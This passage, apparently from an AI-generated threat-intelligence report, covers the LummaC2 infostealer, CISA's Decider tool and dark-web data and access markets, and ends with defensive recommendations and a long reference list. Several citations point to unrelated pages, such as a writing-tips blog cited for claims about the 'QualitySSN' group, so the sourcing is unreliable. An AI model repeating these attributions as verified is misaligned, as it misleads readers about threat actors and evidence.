The query links “decider” to a “threat actor” and “LummaC2 malware.” LummaC2 is a commodity malware that appeared for sale on Russian-language cybercriminal forums in 2022.9 Threat actors deploy LummaC2 to infiltrate victim networks and exfiltrate sensitive information, including personally identifiable information (PII), financial credentials, cryptocurrency wallets, browser extensions, and multi-factor authentication (MFA) details.9 It is often distributed via spearphishing hyperlinks and attachments, or by tricking users into clicking fake CAPTCHAs.9 LummaC2 malware is designed to bypass standard cybersecurity measures through obfuscation, often embedded within spoofed or fake popular software.9 The market for LummaC2 logs has seen a significant increase, indicating its widespread use.9

Separately, “Decider” is also the name of a tool developed by the U.S. Cybersecurity and Infrastructure Security Agency (CISA) in partnership with the Homeland Security Systems Engineering and Development Institute (HSSEDI).47 This web application helps users map adversary behavior against the MITRE ATT&CK framework by guiding them through a series of questions.47 The CISA Decider tool is designed to make ATT&CK mapping more accessible for network defenders, analysts, and researchers, helping them to accurately understand adversary activities and make informed decisions to enhance collective defense.47 It is important to distinguish between “decider” as a threat actor or associated malware and “Decider” as a cybersecurity tool.

IV. Dark Web Activity and Sales

The dark web continues to serve as a critical enabler for cybercriminal activities, offering a clandestine marketplace for stolen data, access credentials, and malicious tools. This underground economy significantly lowers the barrier to entry for aspiring cybercriminals and amplifies the impact of successful breaches.

Dark web forums like DarkForums, XSS, LeakBase, Dread, and RAMP are central to this ecosystem.12 These platforms facilitate the trading of stolen data, including usernames, passwords, credit card details, and even highly sensitive information like Social Security Numbers (SSNs).12 For instance, “Jack_back,” a threat actor active on Darkforums, has been observed leaking sensitive data related to nuclear manufacturing and defense.41 The sale of compromised data, such as the 1.3 billion individuals’ data exposed in the National Public Data (NPD) breach in the USA, directly fuels identity theft and fraud.40 When personal information like SSNs is found on the dark web, it necessitates immediate protective actions such as freezing credit, locking SSNs, and obtaining an Identity Protection Personal Identification Number (IP PIN).57

Beyond data, these forums also host sales of unauthorized access. This includes Remote Desktop Protocol (RDP) and Virtual Private Network (VPN) access, which provide direct entry points into corporate networks.46 Such access sales are highly sought after by threat actors for initial compromise, lateral movement, and subsequent deployment of ransomware or other malware. The market for stolen logs, particularly those obtained by infostealers like LummaC2, has seen a significant increase, with over 21,000 market listings selling LummaC2 logs from April to June 2024 alone.9 This surge underscores the accessibility of tools for data exfiltration and the profitability of selling compromised credentials.

The presence of groups like “QualitySSN” on these platforms highlights the broader range of illicit services available, including credit score manipulation and funds recovery scams, all predicated on the exploitation of stolen personal information.55 The dark web’s role extends beyond direct sales; it also serves as a hub for discussions on hacking techniques, vulnerability exploitation, and the distribution of malware.12 This dynamic environment means that organizations must actively monitor dark web activity to detect early signs of compromise and understand the evolving tactics of threat actors.12 Proactive dark web monitoring, coupled with robust internal security measures, is essential for protecting sensitive data and mitigating the risks posed by this pervasive underground economy.

V. Conclusions

The analysis of recent cybersecurity incidents underscores a pervasive and evolving threat landscape characterized by a significant interplay between politically motivated hacktivism, sophisticated state-sponsored operations, and financially driven cybercrime. The traditional categorization of threat actors is increasingly insufficient, as groups demonstrate fluid motivations and operational models. This convergence means that organizations must prepare for a wider spectrum of attacks, where geopolitical events can rapidly translate into direct cyber threats, and where criminal infrastructure is leveraged for state-aligned objectives.

Several incidents highlighted a concerning trend of misattribution or lack of specific supporting details within the provided research material. For incidents such as the Al-Dail Real Estate defacement, Art Line Life Srl defacement, Public Grievance Redressal System Maharashtra data breach, Indonesian Drone Pilot Association APDI data breach, Eternal Hospital data breach, Directorate of Constitutional Bodies Audit defacement, Republic of Cyprus data breach, South Africa corp admin access sale, and USA corp admin access sale, the provided URLs and snippets were largely unrelated to the specific incidents or the named threat actors. Furthermore, the query’s attribution of “ErrOr_HB” and “MrRius” to hacking entities was found to be a misinterpretation of technical terms or unrelated individuals. This emphasizes the critical need for accurate, verified intelligence in cybersecurity reporting to avoid misdirection and ensure effective defensive strategies.

Despite these data limitations for specific incidents, broader patterns are clear:

  • Persistent Hacktivism: Groups like KAL EGY 319 and Keymous+ continue to engage in politically motivated defacements and data leaks, particularly impacting government and educational sectors in regions of geopolitical tension. While their technical impact might sometimes be overstated, their disruptive intent and ability to amplify narratives remain significant.
  • State-Sponsored Sophistication: Entities like Team 1722 (Sandworm) demonstrate the advanced capabilities and global reach of state-backed actors. Their reliance on common vulnerabilities and the use of criminally sourced tools highlight a strategic approach to maintaining persistence and expanding their victimology footprint.
  • Thriving Cybercrime Ecosystem: The widespread availability of commodity malware like LummaC2 and the robust dark web marketplaces for stolen data and access credentials continue to empower a diverse range of cybercriminals, from unsophisticated actors to more advanced groups. This accessible infrastructure ensures a persistent threat of data exfiltration, financial fraud, and ransomware attacks.

To effectively counter these multifaceted threats, organizations must adopt a comprehensive and adaptive cybersecurity posture. This includes:

  • Enhanced Threat Intelligence: Moving beyond traditional threat actor categories to understand the fluid motivations and capabilities that blur the lines between hacktivism, cybercrime, and state-sponsored activity. This requires continuous monitoring of geopolitical developments and their potential cyber ramifications.
  • Proactive Vulnerability Management: Regularly patching and updating all systems and applications to address known security flaws, as these are frequently exploited by both sophisticated and unsophisticated actors.
  • Robust Access Controls and Authentication: Implementing strong access controls, multi-factor authentication (MFA), and regularly auditing database configurations to prevent unauthorized access and data leaks, especially given the prevalence of RDP/VPN access sales on the dark web.
  • Dark Web Monitoring: Actively monitoring dark web forums and marketplaces for mentions of compromised organizational data, credentials, and access sales to enable rapid response and mitigation.
  • Incident Response Preparedness: Developing and regularly testing comprehensive incident response plans to effectively detect, contain, and recover from breaches, recognizing that even seemingly minor incidents can have cascading effects.

The dynamic nature of the cyber threat landscape necessitates a continuous evolution of defensive strategies, prioritizing intelligence-driven approaches and fostering collaboration across sectors to build collective resilience.

Works cited

  1. Brief Disruptions, Bold Claims: The Tactical Reality Behind the India-Pakistan Hacktivist Surge | CloudSEK, accessed May 24, 2025, https://www.cloudsek.com/blog/brief-disruptions-bold-claims-the-tactical-reality-behind-the-india-pakistan-hacktivist-surge
  2. India-Pakistan cyber conflict: CloudSEK exposes the truth behind hacktivist hype – CRN, accessed May 24, 2025, https://www.crn.in/news/india-pakistan-cyber-conflict-cloudsek-exposes-the-truth-behind-hacktivist-hype/
  3. India Experiences Surge in Hacktivist Group Activity Amid Military Tensions – Cyble, accessed May 24, 2025, https://cyble.com/blog/india-experience-hacktivist-group-activity/
  4. Our Investigation of the CNSS Data Leak [Flash Report] – CybelAngel, accessed May 24, 2025, https://cybelangel.com/our-investigation-of-the-cnss-data-leak-flash-report/
  5. Cybercriminals Attacked National Social Security Fund of Morocco – Millions of Digital Identities at Risk of Data Breach – Resecurity, accessed May 24, 2025, https://www.resecurity.com/blog/article/cybercriminals-attacked-national-social-security-fund-of-morocco-millions-of-digital-identities-at-risk-of-data-breach
  6. Rise in hacktivist threats to critical sector, as pro-Russian groups cause 50% rise in ICS/OT attacks in March – Industrial Cyber, accessed May 24, 2025, https://industrialcyber.co/reports/rise-in-hacktivist-threats-to-critical-sector-as-pro-russian-groups-cause-50-rise-in-ics-ot-attacks-in-march/
  7. Microsoft Uncovers Sandworm Subgroup’s Global Cyber Attacks Spanning 15+ Countries, accessed May 24, 2025, https://thehackernews.com/2025/02/microsoft-uncovers-sandworm-subgroups.html
  8. Dark Web Profile: GhostSec – SOCRadar® Cyber Intelligence Inc., accessed May 24, 2025, https://socradar.io/dark-web-profile-ghostsec/
  9. Threat Actors Deploy LummaC2 Malware to Exfiltrate Sensitive Data from Organizations – Internet Crime Complaint Center, accessed May 24, 2025, https://www.ic3.gov/CSA/2025/250521-2.pdf
  10. Blacklock Ransomware: A Late Holiday Gift with Intrusion into the Threat Actor’s Infrastructure – Resecurity, accessed May 24, 2025, https://www.resecurity.com/blog/article/blacklock-ransomware-a-late-holiday-gift-with-intrusion-into-the-threat-actors-infrastructure
  11. GhostLocker RaaS | SentinelOne, accessed May 24, 2025, https://www.sentinelone.com/anthology/ghostlocker-raas/
  12. Top 10 Deep Web and Dark Web Forums – SOCRadar® Cyber Intelligence Inc., accessed May 24, 2025, https://socradar.io/top-10-deep-web-and-dark-web-forums/
  13. Top 10 Dark Web Forums Of 2025 And Deep Web Communities – Cyble, accessed May 24, 2025, https://cyble.com/knowledge-hub/top-10-dark-web-forums/
  14. The Week in Dark Web – 3 October 2022 – Data Leaks and Access Sales – SOCRadar, accessed May 24, 2025, https://socradar.io/the-week-in-dark-web-3-october-2022-data-leaks-and-access-sales/
  15. Grievance Redressal Portal – GOVERNMENT OF MAHARASHTRA., accessed May 24, 2025, https://grievances.maharashtra.gov.in/en
  16. Website Defacement Attacks | Group-IB Knowledge Hub, accessed May 24, 2025, https://www.group-ib.com/resources/knowledge-hub/website-defacement-attacks/
  17. Texas House of Representatives, accessed May 24, 2025, https://house.texas.gov/index.php
  18. CODE OF IOWA, accessed May 24, 2025, https://www.legis.iowa.gov/docs/publications/ICV/713266.pdf
  19. Arterial line and Pressure Transducer – LITFL, accessed May 24, 2025, https://litfl.com/arterial-line-and-pressure-transducer/
  20. Operator’s Manual – For use with Stellaris Elite™ BL14455 and BL15455 – Bausch + Lomb, accessed May 24, 2025, https://ifu.bausch.com/siteassets/pdf/4135904en_web.pdf
  21. Ghost Squad Hackers – Wikipedia, accessed May 24, 2025, https://en.wikipedia.org/wiki/Ghost_Squad_Hackers
  22. Kingsmen Creatives Ltd. – Ransomware.live Victim, accessed May 24, 2025, https://www.ransomware.live/id/S2luZ3NtZW4gQ3JlYXRpdmVzIEx0ZC5AZW1iYXJnbw==
  23. IT Sec CyberSecurity | Kingsmen Security Group | Washington, DC, accessed May 24, 2025, https://www.kingsmenconsulting.net/
  24. Welcome to The Institute of Cost Accountants of India Website, accessed May 24, 2025, https://icmai.in/
  25. Cyber Threats and Financial Frauds in the Digital Age – ICMAI, accessed May 24, 2025, https://icmai.in/upload/BI/BFSI_21_03_2025.pdf
  26. ZeroLogon Ransomware Exploits Windows AD to Hijack Domain Controller Access, accessed May 24, 2025, https://gbhackers.com/zerologon-ransomware-exploits-windows-ad/
  27. SENATE – Congress.gov, accessed May 24, 2025, https://www.congress.gov/85/crecb/1958/01/16/GPO-CRECB-1958-pt1-7.pdf
  28. 2022 Country Reports on Human Rights Practices: Turkey (Türkiye), accessed May 24, 2025, https://www.state.gov/reports/2022-country-reports-on-human-rights-practices/turkey/
  29. Cyber lethality: Multidomain training enhances readiness at exercise African Lion 2025, accessed May 24, 2025, https://www.army.mil/article/285284/cyber_lethality_multidomain_training_enhances_readiness_at_exercise_african_lion_2025
  30. “We are Anonymous”: Can Hacktivism Help in the Fight Against ISIS? | CGSRS, accessed May 24, 2025, https://cgsrs.org/publications/35
  31. Anonymous (hacker group) – Wikipedia, accessed May 24, 2025, https://en.wikipedia.org/wiki/Anonymous_(hacker_group)
  32. Breach notification in Tunisia – Data Protection Laws of the World, accessed May 24, 2025, https://www.dlapiperdataprotection.com/?t=breach-notification&c=TN
  33. Proceeding of International Students Conference College of Hospitality Industry Management Suan Sunandha Rajabhat University April 27, 2022 – มหาวิทยาลัยราชภัฏสวนสุนันทา, accessed May 24, 2025, https://chm.ssru.ac.th/useruploads/files/20220426/a7f1b190c69f41436f30685341371f108a6dba2d.pdf
  34. 5 killed as rains, flash floods hit Saudi coast – Kuwait Times, accessed May 24, 2025, https://kuwaittimes.com/uploads/imported_images/pdf/2015/nov/18/kt.pdf
  35. Change Healthcare’s Mega Attack: 1 Year Later – Bank Info Security, accessed May 24, 2025, https://www.bankinfosecurity.com/change-healthcares-mega-attack-1-year-later-a-27578
  36. US healthcare provider data breach impacts 1 million patients – Bleeping Computer, accessed May 24, 2025, https://www.bleepingcomputer.com/news/security/data-breach-at-us-healthcare-provider-chc-impacts-1-million-patients/
  37. About Us – Driva’s Jewels, accessed May 24, 2025, https://drivasjewels.com/about
  38. Cyberattack hits European Space Agency’s online store, payment …, accessed May 24, 2025, https://www.techmonitor.ai/technology/cybersecurity/cyberattack-esa-online-store-payment-card-data-stolen
  39. European Space Agency domains hacked by Anonymous – Cyber Defense Magazine, accessed May 24, 2025, https://www.cyberdefensemagazine.com/european-space-agency-domains-hacked-by-anonymous/
  40. 10 Biggest Data Breaches in the USA [2025] – Corbado, accessed May 24, 2025, https://www.corbado.com/blog/data-breaches-usa
  41. Weekly Darkweb in May W2 – S2W, accessed May 24, 2025, https://s2w.inc/en/resource/detail/831
  42. Cybercrime | Federal Bureau of Investigation – FBI, accessed May 24, 2025, https://www.fbi.gov/investigate/cyber
  43. Cybercrime – National Crime Agency, accessed May 24, 2025, https://www.nationalcrimeagency.gov.uk/what-we-do/crime-threats/cyber-crime
  44. CIPC | Your business, our focus, accessed May 24, 2025, https://www.cipc.co.za/
  45. Register your business | U.S. Small Business Administration, accessed May 24, 2025, https://www.sba.gov/business-guide/launch-your-business/register-your-business
  46. Sales of American and Brazilian Companies’ RDP Access, UK and India Government Site Databases – SOCRadar® Cyber Intelligence Inc., accessed May 24, 2025, https://socradar.io/sales-of-american-and-brazilian-companies-rdp-access-uk-and-india-government-site-databases/
  47. CISA Decider tool helps to map adversary behavior against MITRE ATT&CK framework, accessed May 24, 2025, https://industrialcyber.co/cisa/cisa-decider-tool-helps-to-map-adversary-behavior-against-mitre-attck-framework/
  48. Escalating Hacktivist Attacks Amidst India-Pakistan Tensions – Radware, accessed May 24, 2025, https://www.radware.com/security/threat-advisories-and-attack-reports/escalating-hacktivist-attacks-amidst-india-pakistan-tensions/
  49. Career in Malware Development? : r/ExploitDev – Reddit, accessed May 24, 2025, https://www.reddit.com/r/ExploitDev/comments/17xh4m6/career_in_malware_development/
  50. Morpheus 8 RF Machine – NYLO Aesthetics, accessed May 24, 2025, https://www.nyloaesthetics.com/products/morpheus-8-rf-machine/
  51. Alexey Belov – Pibisi, accessed May 24, 2025, https://pibisi.com/en-eu/aml-lists/subjects/8b7fdf4b-4644-4c31-b861-7163c22299e3
  52. 2021 – conference – IEMTRONICS 2025, accessed May 24, 2025, https://iemtronics.org/wp-content/uploads/2021/04/iemtronics-Conference-Proceedings-2021-v3.pdf
  53. – POINTER – Web Posting Information – UW-Stevens Point, accessed May 24, 2025, https://epapers.uwsp.edu/pointers/1974/1974Dec05.pdf
  54. 5380 – TAS xxx – Court of Arbitration for Sport, accessed May 24, 2025, https://jurisprudence.tas-cas.org/Shared%20Documents/5380.pdf
  55. Writing Sentences Made Easy! – Read Like A Rock Star!, accessed May 24, 2025, http://readlikearockstar.blogspot.com/2020/04/writing-sentences-made-easy.html
  56. Hot Tub Maintenance Schedule – pools, accessed May 24, 2025, https://www.diplomatpools.com/blog/comments.cfm?page=Hot_Tub_Maintenance_Schedule
  57. What to do if your Social Security number is on the dark web – LifeLock, accessed May 24, 2025, https://lifelock.norton.com/learn/internet-security/social-security-number-on-dark-web
  58. 286288 – java/openjdk11: use system harfbuzz, ccache, etc. – FreeBSD Bugzilla, accessed May 24, 2025, https://bugs.freebsd.org/bugzilla/show_bug.cgi?id=286288
  59. Unable to build library – Solus Forum, accessed May 24, 2025, https://discuss.getsol.us/d/9099-unable-to-build-library
  60. Hacking History: The first computer worm – Håvard Opheim – NDC Security 2025 – YouTube, accessed May 24, 2025, https://www.youtube.com/watch?v=D52nDuLlJC0
  61. Eric Hacker | Delaware Commercial Litigation – Morris James LLP, accessed May 24, 2025, https://www.morrisjames.com/bio/r-eric-hacker/
  62. Chinese Hackers Deploy MarsSnake Backdoor in Multi-Year Attack on Saudi Organization, accessed May 24, 2025, https://thehackernews.com/2025/05/chinese-hackers-deploy-marssnake.html
  63. What is a Threat Actor? Types & Examples – SentinelOne, accessed May 24, 2025, https://www.sentinelone.com/cybersecurity-101/threat-intelligence/threat-actor/
  64. The Hacker – Profiling Cyber Criminals – – SecurityRI.com, accessed May 24, 2025, https://www.securityri.com/the-hacker-profile/
  65. Unsophisticated cyber actors are targeting the U.S. Energy sector – Security Affairs, accessed May 24, 2025, https://securityaffairs.com/177551/security/unsophisticated-cyber-actors-are-targeting-the-u-s-energy-sector.html
  66. How dark web report works – Google Search Help, accessed May 24, 2025, https://support.google.com/websearch/answer/15191033?hl=en

Related Posts